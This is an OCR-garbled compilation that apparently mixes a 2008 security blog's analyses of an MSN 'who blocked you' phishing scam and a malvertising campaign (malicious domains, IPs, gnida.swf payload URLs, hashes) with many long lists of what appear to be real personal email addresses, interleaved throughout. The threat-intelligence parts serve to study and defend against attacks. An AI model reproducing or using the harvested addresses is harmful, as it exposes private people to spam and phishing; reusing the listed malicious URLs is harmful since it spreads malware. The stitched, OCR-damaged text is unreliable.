stasiek grzywa9988@interia.pl 
zalo783@interia.pl 
sero180492@interia.pl 
matolek269@interia.pl 
curunir@interia.pl 
haker204@interia.pl 
amoremargo@yandex.ru 
dangelon333@yandex.ru 

ray yake@dell.com 
riverO3010@naver.com 

pabli _za2@tlen.pl 
cuba317@inbox.|v 
stuff@4tfoi.com 
bdoom17@gmail.com 
xionin@yandex.ru 

basilis neo@hotmail.com 
isaac abreul3@hotmail.com 
alvarodossantosbarbosa@hotmail.com 
yannicklemaire@live.nl 
harrisonharrisOO@yahoo.co.uk 
jkucera@wp.pl 

suttipong _2005@hotmail.com 
joel O89@hotmail.com 
zhenyakon96@mail.ru 
michalekglowacki@interia.pl 
su.xing@qq.com 
|.a.lourenco@outlook.com 
homagerwa@mail.ru 
xelthor@gmail.com 

13018 


neodrem@seznam.cz 
m.mrowicki@wp.pl 
super.alfa73@yandex.ru 
hstatick@gmail.com 

marco _ott@t-online.de 
martin.baptiste1 @club-internet.fr 
temarken@msn.com 
davefrancois82@gmail.com 
evangran@gmail.com 

xariS paok1926@yahoo.gr 
oorockyoo@gmx.de 
vaskathareios@gmail.com 
conradovillena@yahoo.com 
kohiadi@gmail.com 
jhkos123@gmail.com 
ario.94@hotmail. it 
wilunter@gmail.com 
cagataydeniz07@gmail.com 
glensingo@ymail.com 
ferdinand.lahr@web.de 
sidneyalf@gmail.com 
mindanan@hotmail.com 
principe4to@hotmail.com 
chowalert@live.com 
hugo9168@gmail.com 
diegochr _88@hotmail.com 
nordvider@mail.ru 
carlersej3@gmail.com 
mariolost@poczta.fm 
brenoafigueiredo@gmail.com 
doser3244@gmail.com 
norbertx98x@wp.pl 
kotsosnik@gmail.com 
sewerynkiryluk@gmail.com 


cocee4@gmail.com 


13019 


pablo _ribeiro silva@hotmail.com 
jramon315@gmail.com 
chihenho@gmail.com 
mokinxd@gmail.com 
sorrowfoundmewheniwasyoung@gmail.com 
hugokruger21@gmail.com 
miszum@wp.pl 
paulos-rly@hotmail.gr 
pil-ka212@wp.pl 
ashemelekete@gmail.com 
cooper13@hotmail.gr 
joker.pieceO05@gmail.com 
giannismauroudis@gmail.com 
schuster.carsten@yahoo.de 
skymin86@yahoo.com.tw 
xfer7@aol.com 
nowik318@gmail.com 
nick2006@ua.fm 
mixxedup666@gmail.com 
ddute9920@naver.com 
christotheone@hotmail.com 
anderson.piqueno.cardoso@gmail.com 
panoskarounis@gmail.com 
gregcharron@live.fr 
alexthom@t-online.de 
matthias _schuller@t-online.de 
hanunulilinka@centrum.cz 
michael3108@t-online.de 
klarasuchdolova@centrum.cz 
andreademo@pobox.sk 
klinika@centrum.sk 
dreader@centrum.cz 
philipp-eckers@t-online.de 
izolda@70.ru 

cris96@free.fr 

13020 


jarhar@centrum.cz 
lenkazahorcova@centrum.sk 
kmiraikkonenfl@centrum.cz 
picapica@centrum.sk 
loskot.pavel@atlas.cz 

pet 300@centrum.cz 
kacerdonald@centrum.sk 
klinecj@pobox.sk 
alice.burianova@volny.cz 
boro1994@atlas.sk 
vendulkah@centrum.cz 
david.vejdovsky@centrum.cz 
ivana.kolcunova@centrum.sk 
ivanacharousova@centrum.sk 
dianka@volny.cz 
lukino.123@centrum.sk 
enchantress@centrum.cz 
bokessels@telenet.be 
krichter@atlas.cz 
frederic.reuse@telenet.be 
millei.pisti@centrum.sk 
erocktavision@freenet.de 
julienlaneyrie@free.fr 
evepetrau@free.fr 
kofron.david@centrum.cz 
gw-gamer1@freenet.de 
chrisO94@free. fr 
joluroche@free.fr 
carolpodo@free.fr 
abuckle@nildram.co.uk 
hellokitty952@freenet.de 
davidecek@volny.cz 
sreemome@free.fr 
cherko@wanadoo.fr 


angelo area@virgilio. it 


13021 


niccop@cheapnet. it 
nono.rea@orange.fr 
nk13@otenet.gr 
c.paese@tiscali.it 
newstelevision@orange.fr 
alex.elin@wanadoo.fr 
matt511@post.sk 
lucanubile@tiscali. it 
jacky.angibaud@orange.fr 
florence42@wanadoo.fr 
antos12@tiscali.it 
marcozanotta@tiscali.it 
paar21m19w@freenet.de 
bocherai@noos.fr 
balestier. b@wanadoo.fr 
cucciolo001@tiscali.it 
lindino@tiscali.it 
axor75@dsl.pipex.com 
nicocam@noos.fr 
mr.zabka@post.sk 
|.rio@orange.fr 
maberlefebvre@orange.fr 
boitet.clara@orange.fr 
belis83@virgilio.it 
giampi.temp@tiscali.it 
semfm@poczta.fm 
herthapatrick@freenet.de 
angie.d403@ntlworld.com 
koutik@centrum.cz 
jonaskohout@centrum.cz 
graziajp@tiscali.it 
bougroleguillon@orange.fr 
devil.88@tiscali.it 
mower.spirit@free.fr 
carofriedrich@freenet.de 
13022 


4.2.14 Uncovering a MSN Social Engineering Scam (2008-02-20 22:24) 


fa Nii : 
€ ¥ MSNListStatus.com 


The longly awaited feature for MSN Messenger, completely for free! 


2lease input your MSN Messenger account information to learn who has blocked you. Our 
system will login with this information and learn who has blocked you. 


Account Information: 


MSN Username: | 


isername@hotmail. 


Password: 


[7 I have read and accept the Terms of Use 


This site is not affiliated in any way with Microsoft Corporation 


This MSN scam trying to socially engineer end users into handling their accounting data 
by offering them the opportunity to supposidely see who’s blocked them at MSN, has been 
circulating online for a while in the form of new domains that get actively spammed across 
different forums. The scam itself is just the tip of the iceberg, however it’s a good example of 
a basic social engineering technique, the one with the basic promise. The scam’s pitch : 


"Quickly and easily learn who blocked you on MSN. The longly awaited feature for MSN 
Messenger, completely for free! Please input your MSN Messenger account information to 
learn who has blocked you. Our system will login with this information and learn who has 
blocked you." 


Domains and DNS entries are still active, content’s currently hidden : 


msnliststatus.com - 222.73.220.237 
msnblockerlist.com - 64.202.189.170 
msnblocklist.org - 72.55.142.113 
blockdelete.com - 89.149.242.248 


Why would malicious parties care for collecting accounting data for IM users? If we’re to 
put basic scenario building intelligence logic in this particular case, having access to couple 
of hundreds IM accounts acts as the perfect foundation for a IM malware spreading campaign, 
where access to the stolen data is actually the distribution vector. What would malicious 
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parties do if they want to vertically integrate and earn higher return on investment in this case? 
They would segment the screenames by countries, cities and other OSINT data available, and 
earn higher-profit margins with the segmentation service offered to [1]SPIMmmers. 


Related posts: 

[2]MSN Spamming Bot 

[3]DIY Fake MSN Client Stealing Passwords 
[4]Thousands of IM Screen Names in the Wild 
[5]Yahoo Messenger Controlled Malware 


5. http: //ddanchev. blogspot .com/2007/11/yahoo-messenger-controlled-malware .htm 


4.2.15 Malicious Advertising (Malvertising) Increasing (2008-02-21 05:43) 


190.15,64.190 — quinquecahue.com quinquecshue.com 
64.185 190-15-64- securehost.com akamahi.net 
m thetechnorati.com 
190-15-6 curehost.com voz ogaranon.com 
newbieadquide.com newbieadguide.com 
traffalo.com trafFalo.com 
burnads.com burnads.com 


promoplexer.com é omoprexer.com 


tat.com 


station-appraisals.net 


In the wake of the recent malvertising incidents, it’s about time we get to the bottom of the cam- 
paigns, define the exact hosts and IPs participating, all of their current campaigns, and who’s 
behind them. Who’s been hit at the first place? [1]Expedia, [2]Excite, [3]Rhapsody, [4]MyS- 
pace, all major [5]web properties. Now let’s outline the malicious parties involved. These 
are the currently active domains delivering malicious flash advertisements that were, and still 
participate in the rogue ads attacks : 


01. quinquecahue.com (190.15.64.190) 
quinquecahue.com/swf/gnida.swf?campaign=tautonymus 
quinquecahue.com/swf/gnida.swf?campaign=atliverish 
quinquecahue.com/statsg.php?campaign=meatrichia 


quinquecahue.com/swf/gnida.swf?campaign=atticismus 


02. akamahi.net (190.15.64.185) 
akamahi.net/swf/gnida.swf?cam 
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akamahi.net/swf/gnida.swf?campaign=innational 
akamahi.net/swf/gnida.swf?campaign=annalistno 


akamahi.net/statsg.php?uU=1199891594 &campaign=annalistno 


03. thetechnorati.com (190.15.64.191) 
thetechnorati.com/swf/gnida.swf?campaign=ofcavalier 
thetechnorati.com/swf/gnida.swf?campaign=whoduniton 
thetechnorati.com/statsg.php?u=1198689218 


04. vozemiliogaranon.com (190.15.64.192) 
vozemiliogaranon.com/statss.php?campaign=zoolatrymy 
vozemiliogaranon.com/swf/gnida.swf?campaign=zoolatrymy 
vozemiliogaranon.com/statss.php?campaign=revenantan 


05. newbieadguide.com (190.15.64.188) 
newbieadguide.com/statsg.php?campaign=missblue 
newbieadguide.com/statsg.php?campaign=2rapidly 
newbieadguide.com/statsg.php?campaign=missblue 
newbieadguide.com/statsg.php?campaign=germanit 
newbieadguide.com/swf/gnida.swf?campaign=ta5temix 
newbieadguide.com/swf/gnida.swf?campaign=cOpperin 
newbieadguide.com/swf/gnida.swf?campaign=remainOr 
newbieadguide.com/swf/gnida.swf?campaign=mileroof 
newbieadguide.com/swf/gnida.swf?campaign=m9in9re9 


06. traffalo.com (84.243.252.94) 
traffalo.com/swf/gnida.swf?campaign=atekistics 
traffalo.com/swf/gnida.swf?campaign=byagnostic 
traffalo.com/statsg.php?u=1201711626 


traffalo.com/statsg.php?u=1202224809 


07. burnads.com (84.243.252.85) 
burnads.com/swf/gnida.swf?campaign=1lakeweak 
burnads.com/swf/gnida.swf?campaign=flatfootup 


08. vOzemili0garanOn.com 
vOzemili0garanOn.com/statsg.php?u=1199391035 


09. adtraff.com (84.243.252.84) 
adtraff.com/swf/gnida.swf?campaign=forcejoe 
adtraff.com/swf/gnida.swf?campaign=forcejoe 
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michaeladanek@email.cz 
stanator@centrum.cz 
drmolova@centrum.cz 
jana.black@volny.cz 
volfikO1@centrum.cz 
bpulpan@centrum.cz 
tjuranek@atlas.cz 
martinaskavova@seznam.cz 
janacekpavel@atlas.cz 
dalibor.stejskal@centrum.cz 
t-tina@seznam.cz 
komerel@centrum.cz 
paul.rus@centrum.cz 
jikol@centrum.cz 
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paja.saskova@seznam.cz 
schrollovaromana@seznam.cz 
vitek@selfnet.cz 
klaerusenka@centrum.cz 
pikart.emil@centrum.cz 
jerousek.t@atlas.cz 
turonova.jana@email.cz 
lucie.salai@seznam.cz 
n.pralinka@seznam.cz 
yamano12@volny.cz 
baterie-koupelna@centrum.cz 
proxymail@centrum.cz 
prazenkaantonin@centrum.cz 
mcadova@email.cz 
springg@seznam.cz 
marcela.janalova@centrum.cz 
stev@atlas.cz 
jana.steinocherova@centrum.cz 
astamoni@seznam.cz 
sonicsizer@centrum.cz 
r.jasenska@seznam.cz 
linkovar@seznam.cz 
komara@centrum.cz 
eragon-d@centrum.cz 
lesal@seznam.cz 
josef.ucen@atlas.cz 
pe-ha@seznam.cz 
asysy@centrum.cz 
lenka.kremenakova@centrum.cz 
marketa.svecova@seznam.cz 
anulik@atlas.cz 
anzela.davtyanl1978@seznam.cz 
renata.lisicanova@email.cz 
karolajs55@seznam.cz 


zvv123@seznam.cz 
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bakero@centrum.cz 
santaine@centrum.cz 
geena73@centrum.cz 
sterbovalucie@email.cz 
s.kyznanska@centrum.sk 
seal.deiv@seznam.cz 
happy.miluska@seznam.cz 
mona018@seznam.cz 
jiim@volny.cz 
super.depor@centrum.cz 
vjhdzasu@centrum.cz 
exite@centrum.cz 

tomas _barta@centrum.cz 
ps.lomnice@seznam.cz 
Idasilva@seznam.cz 
hubaj@atlas.cz 
jiza@centrum.cz 

jirka _krejci@volny.cz 
nikushe@centrum.cz 
matej.kovar@volny.cz 
spudil.m@centrum.cz 
vacikarova.m@seznam.cz 
tomasarbt@centrum.cz 
lillia@centrum.cz 
star.05@seznam.cz 
natasa.lukasikova@seznam.cz 
gajda@centrum.cz 
teressa.r@centrum.cz 
freundeskreis@centrum.cz 
rahencl@post.cz 
guba@atlas.cz 
jslezar@centrum.cz 
eva.kormendyova@centrum.cz 
petra.peti@centrum.cz 


jirina.divisova@centrum.cz 
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jirka.vasek@centrum.cz 
alca.stiskalova@seznam.cz 
ivan.str@seznam.cz 
grosaftova@seznam.cz 
stefan.feranec@seznam.cz 
janka.blahova@centrum.cz 
mutant@centrum.cz 
floid26@centrum.cz 
blanka.rachel@centrum.cz 
kamilzelva@volny.cz 
rudy.pinkwart@seznam.cz 
rybizecek@centrum.cz 
drtyl@seznam.cz 
stifterova.alice@seznam.cz 
tereza.mar@volny.cz 
luckal212@atlas.cz 
novak.pepa@volny.cz 
Imicek@volny.cz 
hrrback@centrum.cz 
makina0991@seznam.cz 
jondruchova@seznam.cz 
safara@centrum.cz 
valsorimz@centrum.cz 
safle@centrum.cz 
head7k@centrum.cz 
lucek.v@seznam.cz 
f.kment@volny.cz 
lukasviIk@centrum.cz 
vercasipova@centrum.cz 
cachova.e@seznam.cz 
lumatoha@volny.cz 
helmut.kuska@freenet.de 
sejkorka.p@centrum.cz 
eviknbk@seznam.cz 


rebel7 @centrum.cz 
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mstosova@seznam.cz 
kontyO8@centrum.cz 
snouky@centrum.cz 
snake1988@centrum.cz 
domisha.16@seznam.cz 
sykorova-jitka@email.cz 
jarolimova.lenka@email.cz 
petr.sekanina@volny.cz 
nhaladejova@seznam.cz 


heidi.loemm@freenet.de 


petrabaudysova84@seznam.cz 


pgregr@centrum.cz 
xtremer@centrum.cz 
denisa.hostova@centrum.cz 


adeval@freenet.de 


tereza.najmanova@seznam.cz 


vavracovakamila@seznam.cz 


andycaveman@centrum.cz 


stavebni.centrum.info@email.cz 


michaela.hamplova@centrum.cz 


silvinka2@pobox.sk 
dameget.angel@seznam.cz 
jirakami@seznam.cz 
gabinahavlice@seznam.cz 
werama@seznam.cz 
barbora.st@seznam.cz 
flareoner@centrum.cz 
vosicka.katerina@seznam.cz 
aschmidt1970@gmx.de 
kristynakindova@seznam.cz 
deutscharova@seznam.cz 
sabinacasta@seznam.cz 
jan.karafiat@seznam.cz 
rosemil71@seznam.cz 


gisyca@free.fr 
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agathe.baudry@free.fr 
wild.love@seznam.cz 
nikolabuckova21@seznam.cz 
oklestkova.b@seznam.cz 
palim65@freenet.de 
et0407@seznam.cz 
kacka.krocova@seznam.cz 
rackolen@seznam.cz 
opfoan@email.cz 
oczadly.d@seznam.cz 
kubal.hAr@seznam.cz 
j.a.n.i.c.kK.a.a.a@seznam.cz 
picikl1@seznam.cz 
kornelova.lenka@email.cz 
simone.dietz@wanadoo.fr 
labi3@seznam.cz 
pierredivanni@orange.fr 
petullecz@email.cz 
alicka39@seznam.cz 
nazqui@centrum.cz 
aukropesek@seznam.cz 
haraskova.dominika@seznam.cz 
krejsova.terezka@seznam.cz 
mishatko2@seznam.cz 
vacova@seznam.cz 
luckakohoutova@seznam.cz 
petzelda@seznam.cz 
miriamszabova@post.sk 
culinka3@seznam.cz 
dvojcata.tumovi@seznam.cz 
marcigankova@email.cz 
zderol@seznam.cz 
luxciana@seznam.cz 
zdepsc@email.cz 


zandria.corteo@orange.fr 
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adtraff.com/swf/gnida.swf?campaign=forcejoe 
adtraff.com/swf/gnida.swf?campaign=forcejoe 


adtraff.com/swf/gnida.swf?campaign=forcejoe 
adtraff.com/swf/gnida.swf?campaign=weightt0O 


10. mysurvey4u.com (194.110.67.22) 
mysurvey4u.com/swf/gnida.swf?campaign=rubberu5 


mysurvey4u.com/swf/gnida.swf?campaign=me9ntthe 


11. traveltray.com (194.110.67.23) 
traveltray.com/swf/gnida.swf?campaign=pavoninean 


12. tds.promoplexer.com (217.20.175.39) 
tds.promoplexer.com/statsg.php 
adtds2.promoplexer.com/in.cgi?2 


Additional domains sharing IPs with some of the domains, ones that will eventually used in 
upcoming campaigns : 


aboutstat.com 
newstat.net 
officialstat.com 
stathisranch.net 
station-appraisals.net 


Contact details of the fake new media advertising agencies : 


- Traffalo - " A Leader in Online Behavioral Marketing " 
Phone: +46-40-627-1655 
Fax: +46-8-501-09210 


- MyServey4u - " Relax At Home ... And Get Paid For Your Opinion! " 
mysurvey4u.com 


- AdTraff - " Leader enterprise in Online Marketing " 
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quentinetrobin@orange.fr 
sana4244@wanadoo.fr 
klara.centrum@seznam.cz 
tinou.|!@wanadoo.fr 
natalie.krystofova@seznam.cz 
zeppelina@seznam.cz 
webhost12073@163.com 
puball@seznam.cz 
dostalova-petra@seznam.cz 
duzimarketa@seznam.cz 
houbickkka@seznam.cz 
mikes.today@seznam.cz 
z.0.k.zUzka@seznam.cz 
mich.svarcova@seznam.cz 
bvanat@km.ru 
nikol.reizenauerova@seznam.cz 
sabova.michaela@seznam.cz 
blanka.kubikova@email.cz 
z.jasSkova@seznam.cz 
tradegroup@seznam.cz 
hugo.b131@free.fr 
dessablon.cedric@aliceadsl.fr 
romcabe@seznam.cz 
zbrus@seznam.cz 
grillo8080@tiscali.it 
martinajanecka@seznam.cz 
elisefr@free.fr 

laurah@op.pl 
lesmoiroud@aliceadsl.fr 
demo@mail.ru 
Marcel.langkau@hotmail.de 
Thrash 83@web.de 
kch1997@web.de 
angerer.max@hotmail.de 


patric.volo@ff-contwig.de 
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stefanbruns@freenet.de 
ghettorap@gmx.de 
sascha-schmitt91@hotmail.de 
persbear@gmx.de 
alexpaul2005@web.de 
Chris.Schaefer1994@web.de 
hoerty@hotmail.de 
Benjamin-Behrens@t-online.de 
fox.rolex@web.de 
rjbazooka@yahoo.de 
Stefan.Beck83@web.de 
hermann.koegl@alice.de 
vitz.thomas@web.de 
wainOr@yahoo.de 
r.vo@gmx.de 
lagisse.andre@gmx.de 
bastian@netzblick.de 
em-oi-kahI@hotmail.de 
jan@familie-thurmann.de 
anne _troelenberg@gmx.de 
Bodenverlegung _mayer@freenet.de 
Marc.roob@web.de 
xavernaidoo@web.de 
stangelator@gmx.de 
Christopher Dunne@gmx.de 
p.beischreiber@gmx.de 
bball4dever@gmx.de 
hulck@hotmail.de 
daniel.kazmierczak@web.de 
dicksen@hotmail.de 

oliver _desi@gmx.de 

kexe 94@hotmail.de 
andrea-suchy@gmx.de 
franklandzettel@t-online.de 
lucavierling1991@yahoo.de 
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julian.engelberger@web.de 
Michelano@gmx.de 
s.wettengl@web.de 
marcel.hohenstein@yahoo.de 
robertsdd91@hotmail.de 
rainer@hermann-mue.de 
LazyBird800@yahoo.de 
mattheo.kiesch@web.de 
Cooler heus@gmx.de 
svenfl@web.de 
lehmannstefanl@freenet.de 
malte.wawrzeniewski@web.de 
svenmedenwald@hotmail.de 
memo.47@hotmail.de 
Bialkowski@gmx.de 
marsou@gmx.de 
knoefi@gmx.de 
pedaljerol82@web.de 
Back2@live.de 
manul1974@web.de 
Marcol005@hotmail.de 
dodger1l00@web.de 
lissi.list@yahoo.de 
hendrik.herrle95@gmx.de 
onstage2009@live.de 
andreas.prossegger@gmx.de 
wikinger8888@hotmail.de 
rickygambino@hotmail.de 
t_schuschies@web.de 
andre.oeste@web.de 

su _davidrupp@hotmail.de 
r.kuegeler@gmx.de 
marsmellow@gmx.de 
Dennis.T.98@web.de 
kohImeyer@gmx.de 
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sri_struwl@web.de 
TobiasFlodman@web.de 
psx-dreamer@gmx.de 
droog69@gmx.de 
fpkleeberg@yahoo.de 
info@dirksauter.de 
maxiks@web.de 

timo _schlicht@yahoo.de 
s.mueller-nicolai@gmx.de 
kevin.s _1@hotmail.de 
Julian Breuer@yahoo.de 
david.grathwohl@gmx.de 
fuchs.gunter@yahoo.de 
s.pfaelzner@kabelmail.de 
b.beuster@gmx.de 
sven-mosi@hotmail.de 
daniel.uebler2@arcor.de 
dj-ron@gmx.de 
Johnissonl@web.de 
k.marcinkowski@gmx.de 
neo _svenx@web.de 
bibergerlukas@gmx.de 
thomas92@gmx.de 
goerge.christel@web.de 
jermain2008@hotmail.de 
paul.ziety@gmx.de 
brandy 1987@web.de 
rene.nottrodt@hotmail.de 
bozz17@hotmail.de 
henning-wtm@gmx.de 
jannisblock@hotmail.de 
Sascha-Vennedey@gmx.de 
fsternberg@freenet.de 
julianekalmutzke@yahoo.de 
baleff@gmx.de 

13056 


panics11@web.de 
frederikkoehnken@yahoo.de 
Galina.Stefin@gmx.de 
hunterOO8@arcor.de 
X-Treme1982@t-online.de 
tobias.surau@surau-gmbh.de 
harun.aktas@web.de 
xjensx95@web.de 
vitell91@gmx.de 
ciros89@tiscali. it 

sanco tv4@mail.ru 
chefsache.rec@freenet.de 
bobo2323@tiscali.it 
sashasova@i.ua 
nestordiano99@yahoo.com 
carterspellman93@yahoo.com 
ilya.lukanin@bk.ru 
gabriel-fiori@bol.com.br 
urdoom@mail.com 
stockton.edward@mail.com 
calebtempleton3@yahoo.com 
ted040@free.fr 
geoa96@yahoo.com 
rooobot1lbot4@yahoo.com 
ed.drew@btinternet.com 
2xX85208710@yahoo.com 
derhen04@orange.fr 
bujuirOquai@yahoo.com 
emoodark@wanadoo.fr 
justin.t@mail.com 
oledepoorter@procesfocus.nl 
atyaltasucks@yahoo.com 
white _k1ldd@yahoo.com 
petronelakan@post.cz 


thiagopaixao88@ig.com.br 
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Kevonbarton53@yahoo.com 
flo.dragon@orange.fr 
d-weisensel@t-online.de 
ced.16@wanadoo.fr 
ted.smithl23@yahoo.com 
ryry11202@yahoo.com 
phankasheng@yahoo.com 
izhaar _10@yahoo.com 
dozzer@email.cz 
sokunbidan@yahoo.com 
nurseheart2008@yahoo.com 
moon197820@yahoo.com 
zkillerL95@yahoo.com 
lukman _wibowo@yahoo.com 
huggysnuggleton@yahoo.com 
adam070791@interia.pl 
deone84@web.de 
hurrorek@interia.pl 

david ferkel@yahoo.com 
jack.lakel1@btinternet.com 
exzavion1997@yahoo.com.hk 
tasu914@yahoo.com 
clarisseeigner@yahoo.com 
adrian.senkel@t-online.de 
s4gra321@interia.pl 
mto@noos.fr 
yanmer@noos.fr 
lehmanndieter1@t-online.de 
pappmate@enternet.hu 
a.oswald@bbox.fr 
lamlau@orange.fr 
guibout.thomas@wanadoo.fr 
amckernanl1999@yahoo.com 
dreamz279@interia.pl 
jogurt226@interia.pl 
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nicolas.micallef@free.fr 
nritawasia@yandex.ru 
papillon.l67@hotmail.fr 
fasolebo@yahoo.es 
mar.-1995@hotmail.es 
boulibrat@gmail.com 
ncocopunk66@hotmail.com 
npapillon.l67@hotmail.fr 
nfasolebo@yahoo.es 
nmar.-1995@hotmail.es 
nboulibrat@gmail.com 
Vikssi.biz@yandex.ru 
zdes_luboy adress@mail.ru 
Zaparamaks@yandex.ru 
sven.1980@yandex.ru 
sk.dimonchik@yandex.ru 
pimenov.danila@yandex.ru 
fln3s@exploit.im 
—-silverfoxbas@hotmail.com 
—-silverwolfl1308@yahoo.com 
—-simba0006@naver.com 
—-simon-w@freenet.de 
—-simon.palfreyman@gmail.com 
—-simon815@googlemail.com 
—-simonpegguy@yahoo.fr 
—-sinku@web.de 
—-sino@op.pl 
—-sioleko@op.pl 
—-sion124@gmail.com 
—-sir-cameron@sbcglobal.net 
—-sir.rudolph@live.com 
—-siriusd@hotmail.it 
—-sirwetbiscuitjr@gmail.com 
—-sito1599@gmail.com 
—-sittingwolf21@yahoo.com 
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—-silverbonzol@wp.pl 
—-silverstallion _tim@yahoo.com 
—-simjfk@gmail.com 
—-simon.brueckner@gmx.net 
—-simon.corminboeufl0O@gmail.com 
—-simon.legue@gmail.com 
—-simoncarlsen7@gmail.com 
—-simone.barricalla@yahoo. it 
—-simonix@live.be 
—-simonjscheuerman@hotmail.com 
—-simplemarai@live.com 
—-sineczek@gmail.com 
—-sir.titaner@yandex.com 
—-sirchetb2@aol.com 
—-sirrajlk@hotmail.com 
—-siscogm@yahoo.com 
—-sisconabisco@yahoo.com 
—-siSiv@seznam.cz 
—-silvio.weser@gmx.de 
—-simongrey42@googlemail.com 
—-simpleeddie@gmail.com 
—-simsdogg92@yahoo.com 
—-singleteryl16@yahoo.com 
—-sircross@live.de 
—-sirenqueen _kia@gmx.net 
—-sirmcseba@wp.pl 

—-siva jim _nicholson _pierard@hotmail.com 
—-silvanviethO@gmail.com 
—-silver yue@hotmail.com 
—-silveurred@hotmail.fr 

—-sim _ak@atlas.cz 
—-simenolai@hotmail.com 
—-simon.pilz@gmx.net 
—-simon.milutinovic@gmail.com 
—-simon.el-zein@web.de 
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—-simonjuarez44@gmail.com 
—-simonrolands@gmail.com 
—-simonmountney@googlemail.com 
—-sindriofmars@gmail.com 
—-sinodonte@hotmail.fr 
—-sir.zurek@interia.pl 
—-sirisaac76@msn.com 
—-sirjacob89@hotmail.com 
—-sirjamesddj@gmail.com 
—-sirushimo@hotmail.com 
—-sirzerotheemo@yahoo.com 
—-sixminustwoisnotfour@hotmail.com 
—-sillylilyib@yahoo.com 
—-simon-reinelt@hotmail.com 
—-simon _schneiter@yahoo.de 
—-simon.melissa.strawbridge@gmail.com 
—-simone _verhoeve@hotmail.com 
—-simonseanjayce@gmail.com 
—-simplegreeen@yahoo.com 
—-sinkal01@gmail.com 
—-sionhuang@live.com 

—-sir _frankalton@myway.com 
—-sir_yitan@hotmail.com 
—-sir_dracul@msn.com 
—-sirrespawnsalot@yahoo.com 
—-simenfel@hotmail.com 
—-simi9@gmx.net 

pehal@mail.ru 
david1625@hotmail.com 
killscream@gmail.com 
blackjacklong@gmail.com 
christagg@me.com 
derpderper9090@gmail.com 
akiazack@gmail.com 
berdest665@gmail.com 
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justin.tometzek@gmail.com 
andre.fradinho@hotmail.com 
velusa@hotmail.de 
nicolejoyner47@yahoo.com 
ramboo216@yahoo.com 
robertaugust5 7@yahoo.com 
alxmtnz20@yahoo.com 
mike.cooke73@yahoo.com 
trungrom1989@yahoo.com.vn 
jshface@yahoo.com 

keith _reightler17@yahoo.com 
moose2618@yahoo.com 
rajnarobin@yahoo.com 
xmikec71@yahoo.com 
lilr601@yahoo.com 
navyrotc4@yahoo.com 
brilliantesmith@yahoo.com 
absila2009@yahoo.com 
tommyv61238@yahoo.com 
sal028@yahoo.com 
futzster2000@yahoo.com 
joseph.mathi@yahoo.com 
srowland _2k7@yahoo.com 
amenra7488@yahoo.com 
hinadri@yahoo.com 
miss.kittiekill3r@yahoo.com 
rodboxer2012@yahoo.com 
dustness@yahoo.com 
amandajohnson8018@yahoo.com 
lalastevans@yahoo.com 
gladysyoung65@yahoo.com 
levyell666@yahoo.com.mx 
tataee hiphop@yahoo.com 
southerbor@yahoo.com.ar 
knoskie@yahoo.com 
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Phone number: +49-511-26-098-2104 
Fax: +353-1-633-51-70 


Detection rate : 


gnida.swf : Result: 21/32 (65.63 %) 
Trojan-Downloader.SWF.Gida.a; Troj/Gida-A 


File size : 3186 bytes 


MD5 : 015ebcd3ad6feflcb1b763ccdd63de0c 


SHA1 : 5150568667809b1443b5187ce922b490fe884349 
packers: Swf2Swc 


The bottom line - who’s behind it? Now that pretty much all the domains involved are known, 
as well as the structure of the campaign itself, it’s interesting to discuss where are all the ad- 
vertisements pointing to. Can you name a three letter acronym for a cybercrime powerhouse? 
Yep, RBN’s historical customers’ base, still using [6]RBN’s infrastructure and services. Here’s 
further analysis of this particular case as well - [7]Inside Rogue Flash Ads, by Dennis Elser and 
Micha Pekrul, Secure Computing Corporation, Germany, as well as [8]a tool specifically written 
to [9]detect and prevent such types of [10]malvertising practices. 


ttp://blog.trendmicro.com/malicious-banners-target-expediacom-and-rhapsodycom/ 


ttp://www.theregister.co.uk/2008/01/30/excite_and_rhapsody_rogue_ads/ 


ttp://campustechnology.com/articles/58272/ 


ttp://blog.trendmicro.com/myspace-excite-and-blick-serve-up-malicious-banner-ads/ 


1 
2 
3 
4. 
5. hetp://blog.vashingtonpost .con/securitySix/2006/01/aalwarelaced banner ads_at_ays. heal 
6 
7 
8 
9 


ttp://rbnexploit .blogspot.com/2007/11/rbn-pc-hijacking-via-banner-ads-on.htm 


. http://www.trustedsource.org/download/research_publications/SCJan08. pdf 
. http: //code. google.com/p/erlswf 


ttp://pentaphase .de/index. php?/archives/29-Erlang-unscrables-SWF .htm 


ttp://pentaphase.de/index. php?/archives/28-SWF-in-a-nutshell-and-the-malware-tragedy .htm 
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starsuper42@yahoo.com 
gerall76@yahoo.com 

pizzy love@yahoo.com 
rbthack@yahoo.com 
nn777dannyboy@yahoo.com 
freakynickilOl@yahoo.com 
hodgec7371@yahoo.com 
moejoel1958@yahoo.com 
birthdaypudding@yahoo.com 
m _shajahan2002@yahoo.com 
samuelsryan25@yahoo.com 
yanapayne@yahoo.com 
valleydreamer21@yahoo.com 
earnestadriansam@yahoo.com 
cmody16@yahoo.com 
billhart59@yahoo.com 
extendedwheats@yahoo.com 
mattsumms26@yahoo.com 
fatninjall@yahoo.com 
exiledkushO9@yahoo.com 
nikosatsea@yahoo.com 
victorpoblano@yahoo.com 
micheauxw@yahoo.com 
samkhanna00O@yahoo.com 
mftcohen@yahoo.com 
paul.m1938@yahoo.com 
skyline speed29@yahoo.com 
kimdalporto@yahoo.com 
bluballl1962@yahoo.com 
garyluvsbbw@yahoo.com 
stephen _pacelli@yahoo.com 
jaclyn.brandford@yahoo.com 
handicraft4u2@yahoo.com 
paperboy7199@yahoo.com 
brianmp81@yahoo.com 
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lockbox80@yahoo.com 
wayne.prosperie@yahoo.com 
mr.carillo@yahoo.com 
kyrosxxx@yahoo.com 
drakestephan@yahoo.com 
yovilledude2@yahoo.com 
rjsmithl965@yahoo.com 
taylorkatel1978@yahoo.com 
crewskenny76@yahoo.com 
epopall@yahoo.com 
clowerjoe@yahoo.com 
camilleauza@yahoo.com 
davidl3979@yahoo.com 
bloo54545@yahoo.com 
flickersoffun@yahoo.com 
miss _maziah@yahoo.com 
benjaminzeits@yahoo.com 
selen778@yahoo.com 
myangelmomrip O5@yahoo.com 
sanfor _nicelife@yahoo.com 
pfol983@yahoo.com 
atoraya74@yahoo.com 
mjkden303@yahoo.com 
ra6985@yahoo.com 
ryanbowery@yahoo.com 
kylemyr@yahoo.com 

free solaris@yahoo.com 
lamelaza5@yahoo.com 
tweetyandbmj2002@yahoo.com 
|.lelann@free.fr 
rav.nysa@interia.pl 
momo299@interia.pl 
firefoxa@start.bg 
kristian.nemeth@freenet.de 
oliver@bbsyd.dk 
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floriansardo@tiscali.it 
erykfic@interia.pl 
consumed@freenet.de 
magillonegorillone@tiscali.it 
